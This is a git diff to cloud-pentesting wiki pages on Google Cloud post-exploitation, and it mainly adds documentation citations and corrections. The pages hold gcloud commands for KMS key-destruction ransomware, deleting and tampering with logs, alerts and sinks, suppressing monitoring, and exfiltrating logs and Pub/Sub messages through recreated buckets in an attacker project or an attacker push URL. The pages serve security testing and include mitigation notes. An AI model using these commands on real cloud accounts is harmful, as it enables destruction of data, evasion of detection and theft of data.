+- [5] [Identity and Access Management roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/iam)
+- [6] [gcloud iam roles delete](https://docs.cloud.google.com/sdk/gcloud/reference/iam/roles/delete)
+- [7] [Create and delete service account keys](https://docs.cloud.google.com/iam/docs/keys-create-delete)
+- [8] [Disable and enable service account keys](https://docs.cloud.google.com/iam/docs/keys-disable-enable)
+- [9] [Disable and enable service accounts](https://docs.cloud.google.com/iam/docs/service-accounts-disable-enable)
+- [10] [Delete and undelete service accounts](https://docs.cloud.google.com/iam/docs/service-accounts-delete-undelete)
+- [11] [gcloud iam roles undelete](https://docs.cloud.google.com/sdk/gcloud/reference/iam/roles/undelete)
+- [12] [gcloud iam service-accounts undelete](https://docs.cloud.google.com/sdk/gcloud/reference/iam/service-accounts/undelete)
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
@@ -12,7 +12,7 @@ Find basic information about KMS in:
 
 ### `cloudkms.cryptoKeyVersions.destroy`
 
-An attacker with this permission could destroy a KMS version. In order to do this you first need to disable the key and then destroy it:
+An attacker with this permission could destroy a KMS version. Depending on organization policy, disable the key version before scheduling its destruction; this is also the safer workflow:<sup>[[1]](#references)[[2]](#references)</sup>
 
 <details>
 
@@ -71,32 +71,34 @@ In AWS it's possible to completely **steal a KMS key** by modifying the KMS reso
 
 However, there is another way to perform a global KMS Ransomware, which would involve the following steps:
 
-- Create a new **version of the key with a key material** imported by the attacker
+- Create a new **version of the key with a key material** imported by the attacker <sup>[[3]](#references)</sup>
 
 ```bash
 gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY]
 ```
 
-- Set it as **default version** (for future data being encrypted)
+- Set it as **default version** (for future data being encrypted) <sup>[[3]](#references)</sup>
 - **Re-encrypt older data** encrypted with the previous version with the new one.
 - **Delete the KMS key**
 - Now only the attacker, who has the original key material could be able to decrypt the encrypted data
 
 #### Cloud Storage + CMEK permission model
 
-When objects in Cloud Storage are encrypted with CMEK, the decrypt/encrypt calls to KMS are done by the project's **Cloud Storage service agent whose email is service-${BUCKET_PROJECT_NUMBER}@gs-project-accounts.iam.gserviceaccount.com)**, not directly by the end user reading the object.
+When objects in Cloud Storage are encrypted with CMEK, the decrypt/encrypt calls to KMS are done by the project's **Cloud Storage service agent whose email is service-${BUCKET_PROJECT_NUMBER}@gs-project-accounts.iam.gserviceaccount.com)**, not directly by the end user reading the object. <sup>[[4]](#references)[[5]](#references)</sup>
 
 This means that to read something encrypted by a CMEK:
 
-- The project's cloud storage service agent must have KMS permissions over the used KMS key (typically `roles/cloudkms.cryptoKeyEncrypterDecrypter`).
-- The user only needs object read permissions (for example `storage.objects.get`). He doesn't need permissions over the KMS key.
+- The project's cloud storage service agent must have KMS permissions over the used KMS key (typically `roles/cloudkms.cryptoKeyEncrypterDecrypter`). <sup>[[4]](#references)</sup>
+- The user only needs object read permissions (for example `storage.objects.get`). He doesn't need permissions over the KMS key. <sup>[[4]](#references)</sup>
 
-Thsi means that to control acces to encrypted data with the KMS key it's needed to add/rmeove KMS permissions to the projects cloud storage service agent.
+Thsi means that to control acces to encrypted data with the KMS key it's needed to add/rmeove KMS permissions to the projects cloud storage service agent. <sup>[[4]](#references)</sup>
 
-Note that there is a project-level binding like `roles/cloudkms.cryptoKeyEncrypterDecrypter` for the Storage service agent will still allow decrypt with the keys in the same project.
+Note that there is a project-level binding like `roles/cloudkms.cryptoKeyEncrypterDecrypter` for the Storage service agent will still allow decrypt with the keys in the same project. <sup>[[2]](#references)[[4]](#references)</sup>
 
 
 #### Here are the steps to import a new version and disable/delete the older data:
+
+The sequence below uses Cloud KMS's documented import and key-version lifecycle commands. <sup>[[1]](#references)[[3]](#references)</sup>
 
 <details>
 
@@ -180,6 +182,8 @@ gcloud kms keys versions destroy \
 
 ### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
 
+The following client pattern uses the Cloud KMS symmetric-encryption API and requires `cloudkms.cryptoKeyVersions.useToEncrypt` (or the delegation variant where applicable). <sup>[[2]](#references)[[6]](#references)</sup>
+
 <details>
 
 <summary>Encrypt data with symmetric key (Python)</summary>
@@ -223,6 +227,8 @@ print('Ciphertext:', ciphertext)
 
 ### `cloudkms.cryptoKeyVersions.useToSign`
 
+Cloud KMS signs with an asymmetric key whose purpose is `ASYMMETRIC_SIGN`; the caller needs `cloudkms.cryptoKeyVersions.useToSign`. <sup>[[2]](#references)[[7]](#references)</sup>
+
 <details>
 
 <summary>Sign message with asymmetric key (Python)</summary>
@@ -265,6 +271,8 @@ print('Signature:', signature)
 
 ### `cloudkms.cryptoKeyVersions.useToVerify`
 
+Cloud KMS lists `cloudkms.cryptoKeyVersions.useToVerify` as a verifier permission; its asymmetric-signature guide verifies signatures with the corresponding public key. <sup>[[2]](#references)[[7]](#references)</sup>
+
 <details>
 
 <summary>Verify signature with asymmetric key (Python)</summary>
@@ -297,7 +305,7 @@ print('Verified:', verified)
 ```
 
 ### `cloudkms.cryptoKeyVersions.restore`
-The `cloudkms.cryptoKeyVersions.restore` permission allows an identity to restore a key version that was previously scheduled for destruction or disabled in Cloud KMS, returning it to an active and usable state.
+The `cloudkms.cryptoKeyVersions.restore` permission lets an identity cancel scheduled destruction; the restored version moves to `DISABLED`, so use the update permission to enable it again. <sup>[[1]](#references)[[2]](#references)[[8]](#references)</sup>
 
 ```bash
 gcloud kms keys versions restore <VERSION_ID> \
@@ -308,7 +316,7 @@ gcloud kms keys versions restore <VERSION_ID> \
 ```
 
 ### `cloudkms.cryptoKeyVersions.update`
-The `cloudkms.cryptoKeyVersions.update` permission allows an identity to modify the attributes or the state of a specific key version in Cloud KMS, for example by enabling or disabling it.
+The `cloudkms.cryptoKeyVersions.update` permission allows an identity to modify the attributes or state of a specific key version in Cloud KMS, for example by enabling or disabling it. <sup>[[2]](#references)[[9]](#references)</sup>
 
 ```bash
 # Disable key
@@ -328,6 +336,16 @@ gcloud kms keys versions enable <VERSION_ID> \
 
 </details>
 
+## References
+
+- [1] [Destroy and restore key versions | Cloud Key Management Service | Google Cloud Documentation](https://cloud.google.com/kms/docs/destroy-restore)
+- [2] [Permissions and roles | Cloud Key Management Service | Google Cloud Documentation](https://cloud.google.com/kms/docs/reference/permissions-and-roles)
+- [3] [Import a key version into Cloud KMS | Cloud Key Management Service | Google Cloud Documentation](https://cloud.google.com/kms/docs/importing-a-key)
+- [4] [Use customer-managed encryption keys | Cloud Storage | Google Cloud Documentation](https://cloud.google.com/storage/docs/encryption/using-customer-managed-keys)
+- [5] [Projects | Cloud Storage | Google Cloud Documentation](https://cloud.google.com/storage/docs/projects)
+- [6] [Encrypting and decrypting data with a symmetric key | Cloud Key Management Service | Google Cloud Documentation](https://cloud.google.com/kms/docs/encrypt-decrypt)
+- [7] [Creating and validating digital signatures | Cloud Key Management Service | Google Cloud Documentation](https://cloud.google.com/kms/docs/create-validate-signatures)
+- [8] [gcloud kms keys versions restore | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/kms/keys/versions/restore)
+- [9] [Enable and disable key versions | Cloud Key Management Service | Google Cloud Documentation](https://cloud.google.com/kms/docs/enable-disable)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
@@ -16,15 +16,19 @@ For other ways to disrupt monitoring check:
 gcp-monitoring-post-exploitation.md
 {{#endref}}
 
+The IAM permissions named below cover reading and writing log entries and managing Cloud Logging buckets, linked datasets, views, log-based metrics, and sinks.<sup>[[1]](#references)</sup>
+
 ### Default Logging
 
-**By default you won't get caught just for performing read actions. Fore more info check the Logging Enum section.**
+**Many user-data reads are not recorded by default because Data Access audit logs (except BigQuery Data Access logs) are disabled by default; Admin Activity logs remain enabled by default. For more info check the Logging Enum section.**<sup>[[2]](#references)</sup>
 
 ### Add Excepted Principal
 
-In [https://console.cloud.google.com/iam-admin/audit/allservices](https://console.cloud.google.com/iam-admin/audit/allservices) and [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) is possible to add principals to not generate logs. An attacker could abuse this to prevent being caught.
+In [https://console.cloud.google.com/iam-admin/audit/allservices](https://console.cloud.google.com/iam-admin/audit/allservices) and [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit), it is possible to add exempted principals that do not generate selected Data Access logs. An attacker could abuse this to prevent being caught.<sup>[[3]](#references)</sup>
 
 ### Read logs - `logging.logEntries.list`
+
+The `gcloud logging read` command reads entries matching a filter and supports selecting a log bucket and view.<sup>[[4]](#references)</sup>
 
 <details>
 
@@ -42,7 +46,11 @@ gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=
 
 </details>
 
+When using `--bucket` or `--view` with `gcloud logging read`, also provide the log bucket's `--location`.<sup>[[4]](#references)</sup>
+
 ### `logging.logs.delete`
+
+The `gcloud logging logs delete` command deletes all entries from a log in the global `_Default` bucket.<sup>[[5]](#references)</sup>
 
 <details>
 
@@ -57,6 +65,8 @@ gcloud logging logs delete <log-name>
 
 ### Write logs - `logging.logEntries.create`
 
+The `gcloud logging write` command writes a log entry and creates the destination log if it does not already exist.<sup>[[6]](#references)</sup>
+
 <details>
 
 <summary>Write log entry</summary>
@@ -70,6 +80,8 @@ gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
 
 ### `logging.buckets.update`
 
+The `gcloud logging buckets update` command changes bucket properties, including its description and retention period; the system `_Required` bucket has a fixed 400-day retention period.<sup>[[7]](#references)[[8]](#references)</sup>
+
 <details>
 
 <summary>Update log bucket retention</summary>
@@ -82,7 +94,11 @@ gcloud logging buckets update bucketlog --location=<location> --description="New
 
 </details>
 
+The one-day setting applies to a configurable log bucket; the system `_Required` bucket's 400-day retention cannot be changed.<sup>[[8]](#references)</sup>
+
 ### `logging.buckets.delete`
+
+The `gcloud logging buckets delete` command deletes a Cloud Logging bucket and requires its location.<sup>[[9]](#references)</sup>
 
 <details>
 
@@ -97,6 +113,8 @@ gcloud logging buckets delete BUCKET_NAME --location=<location>
 
 ### `logging.links.delete`
 
+The `gcloud logging links delete` command deletes a linked dataset from a log bucket.<sup>[[10]](#references)</sup>
+
 <details>
 
 <summary>Delete log link</summary>
@@ -109,6 +127,8 @@ gcloud logging links delete <link-id> --bucket <bucket> --location <location>
 </details>
 
 ### `logging.views.delete`
+
+The `gcloud logging views delete` command deletes a view from a log bucket.<sup>[[11]](#references)</sup>
 
 <details>
 
@@ -123,6 +143,8 @@ gcloud logging views delete <view-id> --bucket=<bucket> --location=global
 
 ### `logging.views.update`
 
+The `gcloud logging views update` command changes a view's properties, including its filter and description.<sup>[[12]](#references)</sup>
+
 <details>
 
 <summary>Update logging view to hide data</summary>
@@ -135,6 +157,8 @@ gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" 
 </details>
 
 ### `logging.logMetrics.update`
+
+The `gcloud logging metrics update` command changes an existing logs-based metric's description or filter expression.<sup>[[13]](#references)</sup>
 
 <details>
 
@@ -149,6 +173,8 @@ gcloud logging metrics update <metric-name> --description="Changed metric descri
 
 ### `logging.logMetrics.delete`
 
+The `gcloud logging metrics delete` command deletes a logs-based metric.<sup>[[14]](#references)</sup>
+
 <details>
 
 <summary>Delete log-based metrics</summary>
@@ -162,6 +188,8 @@ gcloud logging metrics delete <metric-name>
 
 ### `logging.sinks.delete`
 
+The `gcloud logging sinks delete` command deletes a sink and stops its export of new log entries.<sup>[[15]](#references)</sup>
+
 <details>
 
 <summary>Delete log sink</summary>
@@ -174,6 +202,8 @@ gcloud logging sinks delete <sink-name>
 </details>
 
 ### `logging.sinks.update`
+
+The `gcloud logging sinks update` command changes a sink's destination or filter, disables it, and manages exclusions; the destination must already exist and Cloud Logging must be authorized to write to it.<sup>[[16]](#references)</sup>
 
 <details>
 
@@ -202,11 +232,17 @@ gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
 
 </details>
 
+The current `gcloud logging sinks update` reference documents `--custom-writer-identity` for a log-bucket destination in a different project; verify support before applying that flag to Cloud Storage sinks.<sup>[[16]](#references)</sup>
+
 ### Cloud Logging sink bucket-name hijack - `storage.buckets.delete`
 
-Cloud Logging sinks can continuously export logs to a Cloud Storage destination such as `storage.googleapis.com/<bucket-name>` or `storage.googleapis.com/<bucket-name>/<prefix>`. If an attacker can delete the destination bucket, but cannot update the sink, they might still redirect future exported logs by recreating the same globally-unique bucket name in an attacker-controlled project.
+Cloud Logging sinks can continuously export logs to a Cloud Storage destination such as `storage.googleapis.com/<bucket-name>` or `storage.googleapis.com/<bucket-name>/<prefix>`. Cloud Storage bucket names are globally unique and can be reused after deletion, so Unit 42 demonstrated that deleting a destination and recreating the same name in an attacker-controlled project could redirect future exports without `logging.sinks.update`.<sup>[[17]](#references)[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
-This is useful when the compromised principal has destructive storage permissions such as `storage.buckets.delete`, `storage.objects.delete`, and `storage.objects.list`, but does not have `logging.sinks.update`.
+**Current behavior:** as of June 22, 2026, Google Cloud documents that a sink stops routing when the destination bucket's parent project changes, marking the sink misconfigured with `bucket_changed_parent_project`. Treat the cross-project hijack flow below as historical or conditional, and verify the target's current behavior before relying on it.<sup>[[18]](#references)[[21]](#references)</sup>
+
+Before that mitigation, the technique was useful when the compromised principal had destructive storage permissions such as `storage.buckets.delete`, `storage.objects.delete`, and `storage.objects.list`, but did not have `logging.sinks.update`.<sup>[[1]](#references)[[17]](#references)[[18]](#references)</sup>
+
+The following commands illustrate the historical flow and should only be used in an authorized test. With current Cloud Logging behavior, recreating the bucket in a different project is expected to stop the sink until it is remediated.<sup>[[18]](#references)[[21]](#references)</sup>
 
 ```bash
 # Find sinks that export to Cloud Storage
@@ -228,10 +264,42 @@ gcloud storage buckets add-iam-policy-binding gs://<BUCKET_NAME> \
   --project <ATTACKER_PROJECT_ID>
 ```
 
-**Potential Impact:** silent long-term exfiltration of future audit logs, application logs, security telemetry, and any other events matched by the sink filter.
+**Potential Impact (before the parent-project fix):** silent long-term exfiltration of future audit logs, application logs, security telemetry, and any other events matched by the sink filter.<sup>[[17]](#references)[[18]](#references)</sup>
 
-**Detection & Mitigation:** alert on deletion of buckets referenced by active sinks, inventory sink destinations for dangling bucket names, restrict `storage.buckets.delete` on logging destinations, and protect export buckets with retention/hold controls where possible.
+**Detection & Mitigation:** alert on deletion of buckets referenced by active sinks, inventory sink destinations for dangling bucket names, check for `bucket_changed_parent_project` sink errors, restrict `storage.buckets.delete` on logging destinations, and protect export buckets with retention/hold controls where possible.<sup>[[21]](#references)[[22]](#references)</sup>
+
+The listing, deletion, recreation, and IAM-binding commands above correspond to the documented `gcloud logging` and `gcloud storage` operations.<sup>[[24]](#references)[[25]](#references)[[26]](#references)[[27]](#references)</sup>
+
+For Cloud Storage destinations, grant the sink's writer identity `roles/storage.objectCreator` on the destination bucket; this role permits object creation but not object listing or deletion.<sup>[[19]](#references)[[23]](#references)</sup>
+
+## References
+
+- [1] [Access control with IAM](https://docs.cloud.google.com/logging/docs/access-control)
+- [2] [Cloud Audit Logs overview](https://docs.cloud.google.com/logging/docs/audit)
+- [3] [Enable Data Access audit logs](https://docs.cloud.google.com/logging/docs/audit/configure-data-access)
+- [4] [gcloud logging read](https://docs.cloud.google.com/sdk/gcloud/reference/logging/read)
+- [5] [gcloud logging logs delete](https://docs.cloud.google.com/sdk/gcloud/reference/logging/logs/delete)
+- [6] [gcloud logging write](https://docs.cloud.google.com/sdk/gcloud/reference/logging/write)
+- [7] [gcloud logging buckets update](https://docs.cloud.google.com/sdk/gcloud/reference/logging/buckets/update)
+- [8] [Quotas and limits](https://docs.cloud.google.com/logging/quotas)
+- [9] [gcloud logging buckets delete](https://docs.cloud.google.com/sdk/gcloud/reference/logging/buckets/delete)
+- [10] [gcloud logging links delete](https://docs.cloud.google.com/sdk/gcloud/reference/logging/links/delete)
+- [11] [gcloud logging views delete](https://docs.cloud.google.com/sdk/gcloud/reference/logging/views/delete)
+- [12] [gcloud logging views update](https://docs.cloud.google.com/sdk/gcloud/reference/logging/views/update)
+- [13] [gcloud logging metrics update](https://docs.cloud.google.com/sdk/gcloud/reference/logging/metrics/update)
+- [14] [gcloud logging metrics delete](https://docs.cloud.google.com/sdk/gcloud/reference/logging/metrics/delete)
+- [15] [gcloud logging sinks delete](https://docs.cloud.google.com/sdk/gcloud/reference/logging/sinks/delete)
+- [16] [gcloud logging sinks update](https://docs.cloud.google.com/sdk/gcloud/reference/logging/sinks/update)
+- [17] [The Global Namespace Risk: Universal Bucket Hijacking Technique for Cloud Data Exfiltration](https://unit42.paloaltonetworks.com/cloud-bucket-hijacking-risks/)
+- [18] [Logging release notes](https://docs.cloud.google.com/logging/docs/release-notes)
+- [19] [Route logs to supported destinations](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
+- [20] [About Cloud Storage buckets](https://docs.cloud.google.com/storage/docs/buckets)
+- [21] [Troubleshoot routing and storing logs](https://docs.cloud.google.com/logging/docs/export/troubleshoot)
+- [22] [Bucket Lock](https://docs.cloud.google.com/storage/docs/bucket-lock)
+- [23] [IAM roles for Cloud Storage](https://docs.cloud.google.com/storage/docs/access-control/iam-roles)
+- [24] [gcloud logging sinks list](https://docs.cloud.google.com/sdk/gcloud/reference/logging/sinks/list)
+- [25] [gcloud storage rm](https://docs.cloud.google.com/sdk/gcloud/reference/storage/rm)
+- [26] [gcloud storage buckets create](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/create)
+- [27] [gcloud storage buckets add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/storage/buckets/add-iam-policy-binding)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
@@ -18,7 +18,7 @@ gcp-logging-post-exploitation.md
 
 ### `monitoring.alertPolicies.delete`
 
-Delete an alert policy:
+Delete an alert policy: <sup>[[1]](#references)[[2]](#references)</sup>
 
 <details>
 
@@ -32,7 +32,7 @@ gcloud alpha monitoring policies delete <policy>
 
 ### `monitoring.alertPolicies.update`
 
-Disrupt an alert policy:
+Disrupt an alert policy: <sup>[[1]](#references)[[3]](#references)</sup>
 
 <details>
 
@@ -57,7 +57,7 @@ gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName'
 
 ### `monitoring.dashboards.update`
 
-Modify a dashboard to disrupt it:
+Modify a dashboard to disrupt it: <sup>[[1]](#references)[[4]](#references)</sup>
 
 <details>
 
@@ -79,7 +79,7 @@ gcloud monitoring dashboards update <dashboard> --config='''
 
 ### `monitoring.dashboards.delete`
 
-Delete a dashboard:
+Delete a dashboard: <sup>[[1]](#references)[[5]](#references)</sup>
 
 <details>
 
@@ -94,7 +94,7 @@ gcloud monitoring dashboards delete <dashboard>
 
 ### `monitoring.snoozes.create`
 
-Prevent policies from generating alerts by creating a snoozer:
+Prevent policies from generating alerts by creating a snoozer: <sup>[[1]](#references)[[6]](#references)[[10]](#references)</sup>
 
 <details>
 
@@ -112,7 +112,7 @@ gcloud monitoring snoozes create --display-name="Maintenance Week" \
 
 ### `monitoring.snoozes.update`
 
-Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
+Update the timing of a snoozer to prevent alerts from being created when the attacker is interested: <sup>[[1]](#references)[[7]](#references)[[10]](#references)</sup>
 
 <details>
 
@@ -130,7 +130,7 @@ gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
 
 ### `monitoring.notificationChannels.delete`
 
-Delete a configured channel:
+Delete a configured channel: <sup>[[1]](#references)[[8]](#references)</sup>
 
 <details>
 
@@ -145,7 +145,7 @@ gcloud alpha monitoring channels delete <channel>
 
 ### `monitoring.notificationChannels.update`
 
-Update labels of a channel to disrupt it:
+Update labels of a channel to disrupt it: <sup>[[1]](#references)[[9]](#references)[[11]](#references)</sup>
 
 <details>
 
@@ -159,7 +159,19 @@ gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email
 
 </details>
 
+## References
+
+- [1] [Cloud Monitoring roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/monitoring)
+- [2] [gcloud alpha monitoring policies delete](https://docs.cloud.google.com/sdk/gcloud/reference/alpha/monitoring/policies/delete)
+- [3] [gcloud alpha monitoring policies update](https://docs.cloud.google.com/sdk/gcloud/reference/alpha/monitoring/policies/update)
+- [4] [gcloud monitoring dashboards update](https://docs.cloud.google.com/sdk/gcloud/reference/monitoring/dashboards/update)
+- [5] [gcloud monitoring dashboards delete](https://docs.cloud.google.com/sdk/gcloud/reference/monitoring/dashboards/delete)
+- [6] [gcloud monitoring snoozes create](https://docs.cloud.google.com/sdk/gcloud/reference/monitoring/snoozes/create)
+- [7] [gcloud monitoring snoozes update](https://docs.cloud.google.com/sdk/gcloud/reference/monitoring/snoozes/update)
+- [8] [gcloud alpha monitoring channels delete](https://docs.cloud.google.com/sdk/gcloud/reference/alpha/monitoring/channels/delete)
+- [9] [gcloud alpha monitoring channels update](https://docs.cloud.google.com/sdk/gcloud/reference/alpha/monitoring/channels/update)
+- [10] [Create and manage snoozes](https://docs.cloud.google.com/monitoring/alerts/manage-snooze)
+- [11] [Create and manage notification channels by API](https://docs.cloud.google.com/monitoring/alerts/using-channels-api)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
@@ -12,7 +12,7 @@ For more information about Pub/Sub check the following page:
 
 ### `pubsub.topics.publish`
 
-Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
+Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:<sup>[[2]](#references)</sup>
 
 <details>
 
@@ -27,7 +27,7 @@ gcloud pubsub topics publish <topic_name> --message "Hello!"
 
 ### `pubsub.topics.detachSubscription`
 
-Useful to prevent a subscription from receiving messages, maybe to avoid detection.
+Useful to prevent a subscription from receiving messages, maybe to avoid detection.<sup>[[3]](#references)</sup>
 
 <details>
 
@@ -42,7 +42,7 @@ gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
 ### `pubsub.topics.delete`
 
 Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
-It's possible to delete a topic even with subscriptions attached to it.
+It's possible to delete a topic even with subscriptions attached to it.<sup>[[4]](#references)</sup>
 
 <details>
 
@@ -56,11 +56,11 @@ gcloud pubsub topics delete <TOPIC NAME>
 
 ### `pubsub.topics.update`
 
-Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
+Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...<sup>[[5]](#references)</sup>
 
 ### `pubsub.topics.setIamPolicy`
 
-Give yourself permission to perform any of the previous attacks.
+Give yourself permission to perform any of the previous attacks.<sup>[[1]](#references)[[20]](#references)[[21]](#references)[[22]](#references)</sup>
 
 ```bash
 # Add Binding
@@ -92,7 +92,7 @@ gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
 
 ### **`pubsub.subscriptions.create,`**`pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)
 
-Get all the messages in a web server:
+Get all the messages in a web server:<sup>[[6]](#references)</sup>
 
 <details>
 
@@ -105,7 +105,7 @@ gcloud pubsub subscriptions create <subscription name> --topic <topic name> --pu
 
 </details>
 
-Create a subscription and use it to **pull messages**:
+Create a subscription and use it to **pull messages**:<sup>[[7]](#references)[[8]](#references)</sup>
 
 <details>
 
@@ -124,7 +124,7 @@ gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
 
 ### `pubsub.subscriptions.delete`
 
-**Delete a subscription** could be useful to disrupt a log processing system or something similar:
+**Delete a subscription** could be useful to disrupt a log processing system or something similar:<sup>[[9]](#references)</sup>
 
 <details>
 
@@ -138,7 +138,7 @@ gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
 
 ### `pubsub.subscriptions.update`
 
-Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
+Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.<sup>[[10]](#references)[[11]](#references)</sup>
 
 <details>
 
@@ -152,9 +152,9 @@ gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name
 
 ### Cloud Storage subscription bucket-name hijack - `storage.buckets.delete`
 
-Pub/Sub subscriptions can write delivered messages into Cloud Storage buckets. If a subscription keeps pointing to `gs://<bucket-name>` and an attacker can delete that bucket, the attacker may recreate the same globally-unique bucket name in another project and receive future messages without changing the subscription.
+Pub/Sub subscriptions can write delivered messages into Cloud Storage buckets. If a subscription keeps pointing to `gs://<bucket-name>` and an attacker can delete that bucket, the attacker may recreate the same globally-unique bucket name in another project and receive future messages without changing the subscription.<sup>[[11]](#references)[[12]](#references)</sup>
 
-This can be valuable when the attacker cannot use `pubsub.subscriptions.update`, but can delete the destination bucket with permissions such as `storage.buckets.delete`, `storage.objects.delete`, and `storage.objects.list`.
+This can be valuable when the attacker cannot use `pubsub.subscriptions.update`, but can delete the destination bucket with permissions such as `storage.buckets.delete`, `storage.objects.delete`, and `storage.objects.list`.<sup>[[13]](#references)</sup>
 
 ```bash
 # Find Cloud Storage subscriptions and their destinations
@@ -181,6 +181,8 @@ gcloud storage buckets add-iam-policy-binding gs://<BUCKET_NAME> \
   --project <ATTACKER_PROJECT_ID>
 ```
 
+The commands below use the documented Cloud Storage CLI operations and grant the Pub/Sub service agent the roles required for Cloud Storage delivery.<sup>[[11]](#references)[[14]](#references)[[15]](#references)[[16]](#references)</sup>
+
 **Potential Impact:** exfiltration of future Pub/Sub messages archived to Cloud Storage, including application events, failed pipeline payloads, logs, or data lake ingestion records.
 
 **Detection & Mitigation:** alert on deletion of buckets used by Pub/Sub subscriptions, review subscriptions with `cloudStorageConfig`, watch for delivery errors followed by bucket recreation, and limit destructive access on message archival buckets.
@@ -191,8 +193,8 @@ Give yourself the permissions needed to perform any of the previously commented 
 
 ### `pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)
 
-Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
-If there aren't any schemas you might need to create one.
+Attack a schema to a topic so messages that don't fulfil it are rejected and the topic is disrupted.<sup>[[17]](#references)</sup>\
+If there aren't any schemas you might need to create one.<sup>[[17]](#references)</sup>
 
 <details>
 
@@ -227,7 +229,7 @@ gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
 
 ### `pubsub.schemas.delete`
 
-This might look like deleting a schema you will be able to send messages that doesn't fulfil with the schema. However, as the schema will be deleted no message will actually enter inside the topic. So this is **USELESS**:
+Deleting a schema does not provide a way to publish messages that bypass validation: while a topic remains associated with that schema, publish attempts fail, and Google recommends removing the association before deleting it. This is therefore **USELESS** as a topic-disruption technique:<sup>[[18]](#references)</sup>
 
 <details>
 
@@ -245,7 +247,7 @@ Give yourself the permissions needed to perform any of the previously commented 
 
 ### `pubsub.snapshots.create`, `pubsub.snapshots.seek`
 
-This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:
+This will create a snapshot of the subscription's acknowledgment state and let you seek the subscription back to that state, making messages unacknowledged for redelivery. Not very useful for an attacker but here it's:<sup>[[19]](#references)</sup>
 
 <details>
 
@@ -260,5 +262,29 @@ gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
 
 </details>
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [gcloud pubsub topics](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/topics)
+- [2] [gcloud pubsub topics publish](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/topics/publish)
+- [3] [Detach subscriptions](https://docs.cloud.google.com/pubsub/docs/detach-subscriptions)
+- [4] [Delete topics](https://docs.cloud.google.com/pubsub/docs/delete-topic)
+- [5] [gcloud pubsub topics update](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/topics/update)
+- [6] [Create push subscriptions](https://docs.cloud.google.com/pubsub/docs/create-push-subscription)
+- [7] [gcloud pubsub subscriptions pull](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/pull)
+- [8] [gcloud pubsub subscriptions create](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/create)
+- [9] [gcloud pubsub subscriptions delete](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/delete)
+- [10] [gcloud pubsub subscriptions update](https://docs.cloud.google.com/sdk/gcloud/reference/pubsub/subscriptions/update)
+- [11] [Create Cloud Storage subscriptions](https://docs.cloud.google.com/pubsub/docs/create-cloudstorage-subscription)
+- [12] [About Cloud Storage buckets](https://docs.cloud.google.com/storage/docs/buckets)
+- [13] [Delete buckets](https://docs.cloud.google.com/storage/docs/deleting-buckets)
